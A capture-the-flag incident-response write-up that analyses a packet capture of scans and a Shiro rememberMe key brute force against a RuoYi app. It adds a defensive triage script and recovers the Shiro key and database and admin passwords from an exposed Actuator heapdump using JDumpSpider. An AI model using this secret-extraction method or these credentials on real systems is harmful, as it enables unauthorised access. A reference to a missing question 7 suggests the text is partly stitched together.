Industry Attack/Defense Incident Response

1. From the packet capture, which IP was the first to launch a scanning attack?

http.request

Looking at the requests in time order, one IP is requesting a long series of directory names (a directory brute force); it is the earliest scanner in the capture.

flag{192.168.0.223}

2. From the packet capture, identify the second scanning IP and the vulnerability scanner it used; submit as flag{x.x.x.x&toolname}

ip.dst == 192.168.0.211 && ip.src == 192.168.0.200 && http

Among the paths this host requests, one contains the bxss.me domain. That is the out-of-band callback domain of Acunetix (AcuMonitor), which the scanner injects into parameters to detect blind XSS/SSRF, so it identifies the tool.

flag{192.168.0.200&Acunetix}

3. Submit the IP that repeatedly brute-forced the key and the number of attempts, as flag{ip&count}

http.request && ip.dst == 192.168.0.211 

One class of traffic is hammering /login, and the rememberMe cookie shows that it is brute-forcing the Shiro framework's cookie encryption key. Shiro stores the remembered identity in that cookie as an AES-encrypted serialized object; when it cannot decrypt the cookie it answers with Set-Cookie: rememberMe=deleteMe, exactly as in the response below, so every deleteMe reply is one rejected candidate key.

GET /login HTTP/1.1
Cookie: rememberMe=cL6HQNLGJbwcJNCqcjg8NdJQnmUd7JdI76Az9uqSiLf1ToFQAZHTcfR5vOOMBjaaUfgzOLQi1+zUDjPV2FWJ6R8R+Q2+Y+5HwO6t3NlOkMoOCvmKtQqJbCOYwGWLIzgMWk85CrHoNKO+Vg6cSOIZHWRnT2HfhDUK1eUmj33kDVOdlmgKgrgHhmIGMwwvCiBs
Accept: text/html,application/json,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Host: 192.168.0.211:12333
Connection: keep-alive

HTTP/1.1 200
Set-Cookie: rememberMe=deleteMe; Path=/; Max-Age=0; Expires=Sun, 28-Jul-2024 02:38:18 GMT; SameSite=lax
Content-Type: application/json;charset=utf-8
Content-Length: 63
Date: Mon, 29 Jul 2024 02:38:17 GMT
Keep-Alive: timeout=60
Connection: keep-alive

Because the question asks for the number of brute-force attempts, the POST requests to /login (ordinary password logins) are not counted. After applying the filter below, the packet count in Wireshark's bottom-right status bar (Displayed) is the number of attempts. The frame.len == 632 term keeps only the key-probing requests: every probe sends the same payload encrypted under a different candidate key, so the ciphertext, the cookie and hence the frame length stay constant, which separates the probes from the other GET /login requests.

http.request.uri == "/login" && ip.dst == 192.168.0.211 && ip.src == 192.168.0.226 && http.request.method == GET && frame.len == 632

flag{192.168.0.226&1068}
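The three Wireshark filters above can be turned into one repeatable triage script. The following is an added example, not part of the original writeup: it reads a tshark field export (the exact tshark command is an assumption, shown in the comment), ranks scanners by first appearance, fingerprints Acunetix from the bxss.me marker, and counts Shiro key probes per client together with the server's rememberMe=deleteMe rejections. The rows embedded in the script are constructed sample data, not packets from the challenge capture, and the cookie values are placeholders.

```python
import csv
import io
from collections import Counter, defaultdict

# Column order of the tshark export this script reads. Assumption: the capture
# was exported with
#   tshark -r capture.pcapng -Y http -T fields -E header=y -E separator=/t \
#     -e frame.time_epoch -e ip.src -e ip.dst -e http.request.method \
#     -e http.request.uri -e http.cookie -e http.response.code -e http.set_cookie
FIELDS = ["frame.time_epoch", "ip.src", "ip.dst", "http.request.method",
          "http.request.uri", "http.cookie", "http.response.code", "http.set_cookie"]

# Request substrings that identify a scanner. bxss.me is the Acunetix AcuMonitor
# out-of-band domain seen in the capture; extend the table for other tools.
TOOL_MARKERS = {"bxss.me": "Acunetix"}

# Constructed rows, not taken from the challenge capture: a directory brute force
# from .223 (A), an Acunetix scan from .200 (B), three Shiro rememberMe key probes
# from .226 (C; two answered with deleteMe, one accepted), a normal POST login and
# an ordinary visitor (V). Cookie values are placeholders, not Shiro ciphertexts.
DELETE_ME = "rememberMe=deleteMe; Path=/; Max-Age=0"
S, A, B, C, V = "192.168.0.211", "192.168.0.223", "192.168.0.200", "192.168.0.226", "192.168.0.50"
ROWS = [
    ("1722220000.10", A, S, "GET", "/admin/", "", "", ""),
    ("1722220000.20", A, S, "GET", "/backup/", "", "", ""),
    ("1722220000.30", A, S, "GET", "/.git/HEAD", "", "", ""),
    ("1722220000.40", A, S, "GET", "/phpinfo.php", "", "", ""),
    ("1722220010.00", B, S, "GET", "/robots.txt", "", "", ""),
    ("1722220010.10", B, S, "GET", "/login?q=bxss.me/t/xss.html", "", "", ""),
    ("1722220010.20", B, S, "GET", "/sitemap.xml", "", "", ""),
    ("1722220010.30", B, S, "GET", "/WEB-INF/web.xml", "", "", ""),
    ("1722220020.00", C, S, "GET", "/login", "rememberMe=probe1", "", ""),
    ("1722220020.01", S, C, "", "", "", "200", DELETE_ME),
    ("1722220020.10", C, S, "GET", "/login", "rememberMe=probe2", "", ""),
    ("1722220020.11", S, C, "", "", "", "200", DELETE_ME),
    ("1722220020.20", C, S, "GET", "/login", "rememberMe=probe3", "", ""),
    ("1722220020.21", S, C, "", "", "", "200", ""),
    ("1722220021.00", C, S, "POST", "/login", "", "", ""),
    ("1722220030.00", V, S, "GET", "/index", "", "", ""),
]
SAMPLE_TSV = "\n".join(["\t".join(FIELDS)] + ["\t".join(r) for r in ROWS]) + "\n"


def load(tsv_text):
    """Parse a header-bearing tshark TSV export into a list of dict rows."""
    return list(csv.DictReader(io.StringIO(tsv_text), delimiter="\t"))


def scanners(rows, min_distinct_uris=4):
    """Source IPs that requested at least min_distinct_uris distinct URIs,
    ordered by their first request; index 0 is the first scanner."""
    first_seen, uris = {}, defaultdict(set)
    for r in rows:
        if not r["http.request.method"]:      # response rows carry no method
            continue
        first_seen.setdefault(r["ip.src"], float(r["frame.time_epoch"]))
        uris[r["ip.src"]].add(r["http.request.uri"])
    hits = [ip for ip, u in uris.items() if len(u) >= min_distinct_uris]
    return sorted(hits, key=first_seen.get)


def fingerprint(rows):
    """Map source IP -> set of scanner names whose markers appear in its URIs."""
    tools = defaultdict(set)
    for r in rows:
        for marker, name in TOOL_MARKERS.items():
            if marker in r["http.request.uri"]:
                tools[r["ip.src"]].add(name)
    return dict(tools)


def shiro_key_bruteforce(rows):
    """Per client: GET /login requests carrying a rememberMe cookie (key probes),
    and server replies that set rememberMe=deleteMe, which Shiro sends whenever
    it cannot decrypt or deserialize the cookie, i.e. the probed key was wrong.
    attempts minus rejected is the number of probes the server accepted."""
    attempts, rejected = Counter(), Counter()
    for r in rows:
        if (r["http.request.method"] == "GET" and r["http.request.uri"] == "/login"
                and "rememberMe=" in r["http.cookie"]
                and "rememberMe=deleteMe" not in r["http.cookie"]):
            attempts[r["ip.src"]] += 1
        if "rememberMe=deleteMe" in r["http.set_cookie"]:
            rejected[r["ip.dst"]] += 1
    return attempts, rejected


if __name__ == "__main__":
    rows = load(SAMPLE_TSV)
    print("scanners in order of appearance:", scanners(rows))
    print("scanner fingerprints:", fingerprint(rows))
    attempts, rejected = shiro_key_bruteforce(rows)
    for ip, n in attempts.items():
        print(f"{ip}: {n} key probes, {rejected[ip]} rejected, {n - rejected[ip]} accepted")
```

Counting the deleteMe replies as well as the probes is what tells you whether the brute force ever succeeded: a probe that is not answered with deleteMe means the server decrypted and deserialized the cookie, which is how the attacker knows the key is right (question 7 below shows the DNS callback used to confirm it).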

4. Submit the key the attacker exploited successfully, as flag{xxxxx}

The challenge provides ruoyi-admin.jar, the jar of the service listening on port 12333. Open it and the key is in its application.yml (shiro.cookie.cipherKey).

Alternatively, fetch /actuator/heapdump from the service on port 9988. This is the Spring Boot Actuator endpoint that returns a dump of the JVM heap; it is reachable because the application exposes every actuator endpoint (management.endpoints.web.exposure.include = * in the dump below). JDumpSpider parses the dump for secrets:

┌──(mikannse㉿kali)-[~/桌面/tools]
└─$ ~/jre1.8.0_381/bin/java -jar JDumpSpider-1.1-SNAPSHOT-full.jar ../heapdump
===========================================
SpringDataSourceProperties
-------------
password = null
driverClassName = com.mysql.cj.jdbc.Driver
url = null
username = null

===========================================
WeblogicDataSourceConnectionPoolConfig
-------------
not found!

===========================================
MongoClient
-------------
not found!

===========================================
AliDruidDataSourceWrapper
-------------
password = ruoyi123
jdbcUrl = jdbc:mysql://localhost:3306/ruoyi?useUnicode=true&characterEncoding=utf8&zeroDateTimeBehavior=convertToNull&useSSL=true&serverTimezone=GMT%2B8
username = root

===========================================
HikariDataSource
-------------
not found!

===========================================
RedisStandaloneConfiguration
-------------
not found!

===========================================
JedisClient
-------------
not found!

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = c+3hFGPjbgzGdrC+MHgoRQ==, algName = AES

===========================================
OriginTrackedMapPropertySource
-------------
management.endpoints.web.exposure.include = *
spring.datasource.druid.slave.enabled = null
spring.thymeleaf.cache = null
spring.datasource.druid.validationQuery = SELECT 1 FROM DUAL
spring.datasource.druid.slave.url =
xss.excludes = /system/notice/*
spring.devtools.restart.enabled = null
pagehelper.params = count=countSql
spring.datasource.druid.initialSize = null
spring.datasource.druid.master.username = root
pagehelper.supportMethodsArguments = null
spring.datasource.druid.master.url = jdbc:mysql://localhost:3306/ruoyi?useUnicode=true&characterEncoding=utf8&zeroDateTimeBehavior=convertToNull&useSSL=true&serverTimezone=GMT%2B8
shiro.rememberMe.enabled = null
swagger.enabled = null
spring.datasource.druid.maxWait = null
server.tomcat.max-threads = null
spring.datasource.druid.filter.stat.slow-sql-millis = null
spring.datasource.druid.filter.wall.config.multi-statement-allow = null
shiro.user.unauthorizedUrl = /unauth
shiro.session.dbSyncPeriod = null
spring.datasource.druid.minIdle = null
ruoyi.copyrightYear = null
xss.urlPatterns = /system/*,/monitor/*,/tool/*
spring.datasource.druid.filter.stat.log-slow-sql = null
ruoyi.profile = /home/security/upload
shiro.user.loginUrl = /login
management.server.port = null
spring.profiles.active = druid
spring.datasource.druid.master.password = ruoyi123
spring.datasource.druid.maxActive = null
spring.datasource.druid.statViewServlet.allow =
shiro.session.expireTime = null
mybatis.typeAliasesPackage = com.ruoyi.**.domain
spring.servlet.multipart.max-request-size = 20MB
shiro.session.maxSession = null
spring.datasource.type = com.alibaba.druid.pool.DruidDataSource
spring.messages.basename = static/i18n/messages
spring.datasource.druid.testWhileIdle = null
shiro.cookie.httpOnly = null
ruoyi.demoEnabled = null
ruoyi.name = RuoYi
spring.datasource.driverClassName = com.mysql.cj.jdbc.Driver
spring.datasource.druid.minEvictableIdleTimeMillis = null
mybatis.configLocation = classpath:mybatis/mybatis-config.xml
shiro.user.indexUrl = /index
mybatis.mapperLocations = classpath*:mapper/**/*Mapper.xml
management.endpoint.heapdump.enabled = null
management.endpoints.web.base-path = /actuator
spring.jackson.date-format = yyyy-MM-dd HH:mm:ss
server.tomcat.min-spare-threads = null
spring.datasource.druid.statViewServlet.enabled = null
logging.level.org.springframework = warn
shiro.cookie.path = /
spring.datasource.druid.filter.stat.enabled = null
server.port = null
xss.enabled = null
ruoyi.version = 4.7.1
spring.datasource.druid.maxEvictableIdleTimeMillis = null
spring.datasource.druid.webStatFilter.enabled = null
shiro.cookie.domain =
spring.datasource.druid.statViewServlet.login-username = ruoyi
ruoyi.addressEnabled = null
spring.datasource.druid.filter.stat.merge-sql = null
spring.servlet.multipart.max-file-size = 10MB
server.tomcat.uri-encoding = UTF-8
spring.thymeleaf.mode = HTML
logging.level.com.ruoyi = debug
spring.thymeleaf.encoding = utf-8
shiro.user.captchaType = math
server.servlet.context-path = /
user.password.maxRetryCount = null
spring.datasource.druid.testOnReturn = null
spring.datasource.druid.slave.password =

===========================================
MutablePropertySources
-------------
awt.toolkit = sun.awt.X11.XToolkit
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
sun.cpu.isalist =
sun.jnu.encoding = UTF-8
java.runtime.version = 1.8.0_412-8u412-ga-1~22.04.1-b08
java.class.path = /home/security/ruoyi/ruoyi-admin.jar
path.separator = :
java.vm.vendor = Private Build
os.version = 5.15.0-94-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
java.runtime.name = OpenJDK Runtime Environment
gen =
file.encoding = UTF-8
catalina.useNaming = false
spring.beaninfo.ignore = true
java.vm.specification.version = 1.8
os.name = Linux
java.vm.name = OpenJDK 64-Bit Server VM
local.server.port = null
packageName = com.ruoyi.system
user.country = US
autoRemovePre = false
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
sun.java.command = /home/security/ruoyi/ruoyi-admin.jar
java.io.tmpdir = /tmp
catalina.home = /tmp/tomcat.12333.5671829705739952134
java.version = 1.8.0_412
user.home = /root
author = ruoyi
user.language = en
PID = 3607
java.awt.printerjob = sun.print.PSPrinterJob
CONSOLE_LOG_CHARSET = UTF-8
file.separator = /
catalina.base = /tmp/tomcat.9988.4699807479784916975
java.vm.info = mixed mode
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
FILE_LOG_CHARSET = UTF-8
tablePrefix = sys_
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
java.awt.headless = true
sun.io.unicode.encoding = UnicodeLittle
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext

===========================================
MapPropertySources
-------------
local.server.port = null

===========================================
ConsulPropertySources
-------------
not found!

===========================================
JavaProperties
-------------
java.util.logging.FileHandler.pattern = %h/java%u.log
awt.toolkit = sun.awt.X11.XToolkit
sun.cpu.isalist =
sun.jnu.encoding = UTF-8
sun.arch.data.model = 64
password = ruoyi123
catalina.useNaming = false
useUnicode = true
security.overridePropertiesFile = true
id = selectGenTableVo
kaptcha.textproducer.char.length = 4
kaptcha.image.width = 160
sun.boot.library.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/amd64
security.provider.7 = com.sun.security.sasl.Provider
sun.java.command = /home/security/ruoyi/ruoyi-admin.jar
supportMethodsArguments = true
security.provider.9 = sun.security.smartcardio.SunPCSC
java.specification.vendor = Oracle Corporation
security.provider.1 = sun.security.provider.Sun
security.provider.2 = sun.security.rsa.SunRsaSign
kaptcha.obscurificator.impl = com.google.code.kaptcha.impl.ShadowGimpy
security.provider.3 = sun.security.ec.SunEC
params = count=countSql
networkaddress.cache.negative.ttl = 10
security.provider.4 = com.sun.net.ssl.internal.ssl.Provider
security.provider.5 = com.sun.crypto.provider.SunJCE
security.provider.6 = sun.security.jgss.SunProvider
file.separator = /
kaptcha.border.color = 105,179,90
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
dbname = ruoyi
serverTimezone = GMT+8
package.definition = sun.,com.sun.xml.internal.,com.sun.imageio.,com.sun.istack.internal.,com.sun.jmx.,com.sun.media.sound.,com.sun.naming.internal.,com.sun.proxy.,com.sun.corba.se.,com.sun.org.apache.bcel.internal.,com.sun.org.apache.regexp.internal.,com.sun.org.apache.xerces.internal.,com.sun.org.apache.xpath.internal.,com.sun.org.apache.xalan.internal.extensions.,com.sun.org.apache.xalan.internal.lib.,com.sun.org.apache.xalan.internal.res.,com.sun.org.apache.xalan.internal.templates.,com.sun.org.apache.xalan.internal.utils.,com.sun.org.apache.xalan.internal.xslt.,com.sun.org.apache.xalan.internal.xsltc.cmdline.,com.sun.org.apache.xalan.internal.xsltc.compiler.,com.sun.org.apache.xalan.internal.xsltc.trax.,com.sun.org.apache.xalan.internal.xsltc.util.,com.sun.org.apache.xml.internal.res.,com.sun.org.apache.xml.internal.resolver.helpers.,com.sun.org.apache.xml.internal.resolver.readers.,com.sun.org.apache.xml.internal.security.,com.sun.org.apache.xml.internal.serializer.utils.,com.sun.org.apache.xml.internal.utils.,com.sun.org.glassfish.,com.oracle.xmlns.internal.,com.oracle.webservices.internal.,oracle.jrockit.jfr.,org.jcp.xml.dsig.internal.,jdk.internal.,jdk.nashorn.internal.,jdk.nashorn.tools.,jdk.xml.internal.,com.sun.activation.registries.,jdk.jfr.events.,jdk.jfr.internal.,jdk.management.jfr.internal.
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
java.runtime.version = 1.8.0_412-8u412-ga-1~22.04.1-b08
user.name = root
policy.url.1 = file:${java.home}/lib/security/java.policy
securerandom.source = file:/dev/random
policy.url.2 = file:${user.home}/.java.policy
jdk.tls.disabledAlgorithms = SSLv3, TLSv1, TLSv1.1, RC4, DES, MD5withRSA, DH keySize < 1024, EC keySize < 224, 3DES_EDE_CBC, anon, NULL, include jdk.disabled.namedCurves
policy.ignoreIdentityScope = false
gen =
file.encoding = UTF-8
java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter
kaptcha.textproducer.font.size = 38
jdk.sasl.disabledMechanisms =
java.io.tmpdir = /tmp
java.version = 1.8.0_412
org.quartz.jobStore.misfireThreshold = 12000
java.vm.specification.name = Java Virtual Machine Specification
PID = 3607
jdk.tls.keyLimits = AES/GCM/NoPadding KeyUpdate 2^37
java.awt.printerjob = sun.print.PSPrinterJob
CONSOLE_LOG_CHARSET = UTF-8
jdk.xml.dsig.secureValidationPolicy = disallowAlg http://www.w3.org/TR/1999/REC-xslt-19991116,disallowAlg http://www.w3.org/2001/04/xmldsig-more#rsa-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#hmac-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#md5,maxTransforms 5,maxReferences 30,disallowReferenceUriSchemes file http https,minKeySize RSA 1024,minKeySize DSA 1024,minKeySize EC 224,noDuplicateIds,noRetrievalMethodLoops
kaptcha.noise.impl = com.google.code.kaptcha.impl.NoNoise
java.library.path = /usr/java/packages/lib/amd64:/usr/lib/x86_64-linux-gnu/jni:/lib/x86_64-linux-gnu:/usr/lib/x86_64-linux-gnu:/usr/lib/jni:/lib:/usr/lib
java.vendor = Private Build
tablePrefix = sys_
java.specification.maintenance.version = 5
handlers = java.util.logging.ConsoleHandler
sun.io.unicode.encoding = UnicodeLittle
krb5.kdc.bad.policy = tryLast
java.class.path = /home/security/ruoyi/ruoyi-admin.jar
helperDialect = mysql
java.vm.vendor = Private Build
jdk.security.legacyAlgorithms = SHA1, RSA keySize < 2048, DSA keySize < 2048
jdk.disabled.namedCurves = secp112r1, secp112r2, secp128r1, secp128r2, secp160k1, secp160r1, secp160r2, secp192k1, secp192r1, secp224k1, secp224r1, secp256k1, sect113r1, sect113r2, sect131r1, sect131r2, sect163k1, sect163r1, sect163r2, sect193r1, sect193r2, sect233k1, sect233r1, sect239k1, sect283k1, sect283r1, sect409k1, sect409r1, sect571k1, sect571r1, X9.62 c2tnb191v1, X9.62 c2tnb191v2, X9.62 c2tnb191v3, X9.62 c2tnb239v1, X9.62 c2tnb239v2, X9.62 c2tnb239v3, X9.62 c2tnb359v1, X9.62 c2tnb431r1, X9.62 prime192v2, X9.62 prime192v3, X9.62 prime239v1, X9.62 prime239v2, X9.62 prime239v3, brainpoolP256r1, brainpoolP320r1, brainpoolP384r1, brainpoolP512r1
crypto.policy = unlimited
jceks.key.serialFilter = java.lang.Enum;java.security.KeyRep;java.security.KeyRep$Type;javax.crypto.spec.SecretKeySpec;!*
login.configuration.provider = sun.security.provider.ConfigFile
user.timezone =
org.quartz.jobStore.maxMisfiresToHandleAtATime = 1
org.quartz.threadPool.threadPriority = 5
host = localhost
kaptcha.textproducer.char.space = 3
java.vm.specification.version = 1.8
os.name = Linux
zeroDateTimeBehavior = CONVERT_TO_NULL
user.country = US
kaptcha.noise.color = white
kaptcha.session.key = kaptchaCode
autoRemovePre = false
jdk.security.caDistrustPolicies = SYMANTEC_TLS
org.quartz.scheduler.instanceId = AUTO
sun.cpu.endian = little
user.home = /root
author = ruoyi
user.language = en
jdk.http.auth.tunneling.disabledSchemes = Basic
en = UTF-8
org.quartz.jobStore.txIsolationLevelSerializable = true
jdk.tls.alpnCharset = ISO_8859_1
org.quartz.jobStore.tablePrefix = QRTZ_
ssl.KeyManagerFactory.algorithm = SunX509
FILE_LOG_CHARSET = UTF-8
port = 3306
.level = INFO
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
java.awt.headless = true
com.xyz.foo.level = SEVERE
characterEncoding = utf8
kaptcha.textproducer.font.names = Arial,Courier
ftp.nonProxyHosts = localhost|127.*|[::1]
policy.provider = sun.security.provider.PolicyFile
jdbc = highgo:=com.highgo.jdbc.Driver
path.separator = :
fr = UTF-8
jdk.http.ntlm.transparentAuth = disabled
os.version = 5.15.0-94-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
java.runtime.name = OpenJDK Runtime Environment
keystore.type.compat = true
kaptcha.textproducer.impl = com.ruoyi.framework.config.KaptchaTextCreator
spring.beaninfo.ignore = true
org.quartz.jobStore.isClustered = true
java.vm.name = OpenJDK 64-Bit Server VM
packageName = com.ruoyi.system
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
java.util.logging.FileHandler.formatter = java.util.logging.XMLFormatter
java.util.logging.FileHandler.count = 1
catalina.home = /tmp/tomcat.12333.5671829705739952134
sun.cds.enableSharedLookupCache = false
sun.security.krb5.maxReferrals = 5
catalina.base = /tmp/tomcat.9988.4699807479784916975
java.util.logging.FileHandler.limit = 50000
java.vm.info = mixed mode
keystore.type = jks
org.quartz.scheduler.instanceName = RuoyiScheduler
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext
policy.expandProperties = true
securerandom.strongAlgorithms = NativePRNGBlocking:SUN
user = root
org.quartz.jobStore.clusterCheckinInterval = 15000

===========================================
ProcessEnvironment
-------------
not found!

===========================================
OSS
-------------
not found!

===========================================
UserPassSearcher
-------------
com.ruoyi.web.controller.tool.UserEntity:
[password = admin123, username = ry]
[password = admin123, username = admin]

com.ruoyi.web.controller.demo.controller.UserTableModel:
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 120.0, userName = 测试21, userId = 21, userCode = 1000021]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 160.0, userName = 测试19, userId = 19, userCode = 1000019]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 120.0, userName = 测试12, userId = 12, userCode = 1000012]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 220.0, userName = 测试20, userId = 20, userCode = 1000020]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 180.0, userName = 测试9, userId = 9, userCode = 1000009]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 490.0, userName = 测试23, userId = 23, userCode = 1000023]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 220.0, userName = 测试4, userId = 4, userCode = 1000004]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 280.0, userName = 测试14, userId = 14, userCode = 1000014]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 380.0, userName = 测试13, userId = 13, userCode = 1000013]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 110.0, userName = 测试3, userId = 3, userCode = 1000003]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 210.0, userName = 测试10, userId = 10, userCode = 1000010]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 170.0, userName = 测试8, userId = 8, userCode = 1000008]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 140.0, userName = 测试5, userId = 5, userCode = 1000005]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 160.0, userName = 测试7, userId = 7, userCode = 1000007]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 250.0, userName = 测试25, userId = 25, userCode = 1000025]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 110.0, userName = 测试11, userId = 11, userCode = 1000011]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 570.0, userName = 测试24, userId = 24, userCode = 1000024]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 180.0, userName = 测试2, userId = 2, userCode = 1000002]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 340.0, userName = 测试18, userId = 18, userCode = 1000018]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 330.0, userName = 测试6, userId = 6, userCode = 1000006]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 570.0, userName = 测试15, userId = 15, userCode = 1000015]
[userSex = 0, userPhone = 15888888888, userEmail = ry@qq.com, userBalance = 150.0, userName = 测试1, userId = 1, userCode = 1000001]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 250.0, userName = 测试26, userId = 26, userCode = 1000026]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 210.0, userName = 测试17, userId = 17, userCode = 1000017]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 130.0, userName = 测试22, userId = 22, userCode = 1000022]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 260.0, userName = 测试16, userId = 16, userCode = 1000016]

com.ruoyi.web.controller.demo.controller.UserFormModel:
[userPhone = 15666666666, userName = 测试5, userId = 5, userCode = 1000005]
[userPhone = 15888888888, userName = 测试1, userId = 1, userCode = 1000001]
[userPhone = 15666666666, userName = 测试3, userId = 3, userCode = 1000003]
[userPhone = 15666666666, userName = 测试4, userId = 4, userCode = 1000004]
[userPhone = 15666666666, userName = 测试2, userId = 2, userCode = 1000002]

org.apache.shiro.web.filter.authc.FormAuthenticationFilter:
[failureKeyAttribute = shiroLoginFailure, loginUrl = /login, successUrl = /, usernameParam = username, passwordParam = password]

com.mysql.cj.protocol.a.authentication.AuthenticationLdapSaslClientPlugin:
[firstPass = true]

com.mysql.cj.protocol.a.authentication.CachingSha2PasswordPlugin:
[publicKeyRequested = false]

com.mysql.cj.protocol.a.authentication.Sha256PasswordPlugin:
[publicKeyRequested = false]

com.mysql.cj.NativeCharsetSettings:
[platformDbCharsetMatches = true]

com.mysql.cj.protocol.a.NativeAuthenticationProvider:
[database = ruoyi, useConnectWithDb = true, serverDefaultAuthenticationPluginName = caching_sha2_password, username = root]

com.mysql.cj.conf.HostInfo:
[password = ruoyi123, host = localhost, user = root]

com.mysql.cj.jdbc.ConnectionImpl:
[password = ruoyi123, database = ruoyi, origHostToConnectTo = localhost, user = root]

com.ruoyi.web.controller.demo.domain.UserOperateModel:
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 120.0, userName = 测试21, userId = 21, userCode = 1000021]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 160.0, userName = 测试19, userId = 19, userCode = 1000019]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 120.0, userName = 测试12, userId = 12, userCode = 1000012]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 220.0, userName = 测试20, userId = 20, userCode = 1000020]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 180.0, userName = 测试9, userId = 9, userCode = 1000009]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 490.0, userName = 测试23, userId = 23, userCode = 1000023]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 220.0, userName = 测试4, userId = 4, userCode = 1000004]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 280.0, userName = 测试14, userId = 14, userCode = 1000014]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 380.0, userName = 测试13, userId = 13, userCode = 1000013]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 110.0, userName = 测试3, userId = 3, userCode = 1000003]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 210.0, userName = 测试10, userId = 10, userCode = 1000010]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 170.0, userName = 测试8, userId = 8, userCode = 1000008]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 140.0, userName = 测试5, userId = 5, userCode = 1000005]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 160.0, userName = 测试7, userId = 7, userCode = 1000007]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 250.0, userName = 测试25, userId = 25, userCode = 1000025]
